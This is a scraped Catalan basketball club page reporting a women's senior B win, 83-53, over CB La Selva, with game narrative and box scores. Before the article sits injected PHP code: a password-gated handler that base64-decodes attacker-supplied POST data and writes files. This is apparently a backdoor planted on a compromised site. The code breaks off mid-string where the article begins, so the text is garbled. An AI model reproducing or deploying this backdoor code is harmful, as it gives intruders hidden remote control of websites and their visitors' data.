function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Partidàs del sènior B contra La Selva (83-53) - Tgn Bàsquet Club -

Partidàs del sènior B contra La Selva (83-53)

Updated: octubre 21, 2013

Partit contra un rival que ha jugat contra els mateixos equips que nosaltres amb resultats similars. Aparentment partit molt igualat, que havíem de tractar amb respecte i valentia. Em començat molt serioses en defensa, dominant el rebot defensiu i sense permetre cistelles fàcils, aconseguint una diferència de 13 punts al final del primer quart. El segon quart ha continuat amb la mateixa tònica, superioritat del conjunt lila tant en atac com en defensa, jugant amb molt ritme i intensitat.

A l’inici del tercer quart les jugadores del TGN baixen l’atenció, i La Selva aprofita per fer un parcial de 8-0 en els primers quatre minuts. Però les nostres reaccionen i tornen a agafar les regnes del partit mantenint la diferència de 31 punts fins al final.

Avui em fet molt bona feina l’ambit defensiu, em continuat amb la bona feina en atac que portem als darrers partits i em tingut encert de cara a cistella. Estem aconseguin mes consistencia com equip, però hem d’aconseguir mantenir la intensitat a l’inici del segon temps.

TGN Bàsquet 83 – CB La Selva 53

TGN BÀSQUET: Cos (6), Moreno (11), Masvidal (12), Gomez (8) i Guardia (13) – cinc inicial- Lopez (8), Nieto, Vallhonrat (4),  Molle, Gonzalez (2), Altarejos (21) i Berasategui (1). 18 faltes. 5 triples:  Altarejos (1), Guardia (2) i Moreno (2). 16/25 tirs lliures.

CB LA SELVA: Pintaluba, Olive (12), Ribero, Algar (8) i Miñambres (2) – cinc inicial – Poblet, Aguilar (15), Hernandez (8), Marti (3) i Cañellas (4). 23 faltes. 2/17 tirs lliures.

Parcials: 25-12, 31-12, 14-14 i 13-14

Arbitre: Ozaez, J.